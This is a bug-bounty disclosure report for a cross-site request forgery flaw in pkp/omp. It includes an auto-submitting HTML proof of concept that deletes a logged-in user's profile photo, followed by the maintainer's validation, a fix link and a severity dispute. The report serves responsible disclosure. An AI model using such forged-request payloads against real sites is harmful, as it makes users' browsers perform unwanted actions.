Cross-Site Request Forgery (CSRF) in pkp/omp

Valid

Reported on

Oct 14th 2021


✍️ Description

Attacker or malicious user is able to delete any user profile photo if a logged in user visits attacker website. because lack of CSRF token

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser
2.you can check unintentionally your profile photo deleted

//POC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.publicknowledgeproject.org/omp3/demo/index.php/aup-demo/$$$call$$$/tab/user/profile-tab/delete-profile-image">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of forcing user to unintentional delete profile photo

💥 Test

Tested on Firefox and safari.

💥 Fix

You should set a CSRF token on this requeset.

We have contacted a member of the pkp/omp team and are waiting to hear back 2 months ago
We have contacted a member of the pkp/omp team and are waiting to hear back 2 months ago
We have contacted a member of the pkp/omp team and are waiting to hear back 2 months ago
Alec Smecher validated this vulnerability 2 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher
2 months ago

Fix here: https://github.com/pkp/pkp-lib/issues/7380

This does not rate a "high" severity.

The cited "navigationMenus.xml" has nothing to do with the reported issue.

Alec Smecher confirmed that a fix has been merged on 1ae8e3 2 months ago
Alec Smecher has been awarded the fix bounty
navigationMenus.xml#L1-L41 has been validated
Musio
2 months ago

Researcher


Hi. I did many search for finding flawed code but i cann't find it and the only file i found with profile/photo is navigationMenus.xml. i cann't now edit the severity but you right it's not high